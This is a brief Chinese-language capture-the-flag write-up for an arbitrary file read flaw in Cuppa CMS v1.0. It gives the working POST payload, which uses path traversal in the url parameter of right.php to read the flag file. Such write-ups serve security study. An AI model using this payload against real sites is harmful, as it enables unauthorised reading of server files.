…
漏洞描述:Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
访问/templates/default/html/windows/right.php
,POST传payload:id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../flag
,然后F12看见flag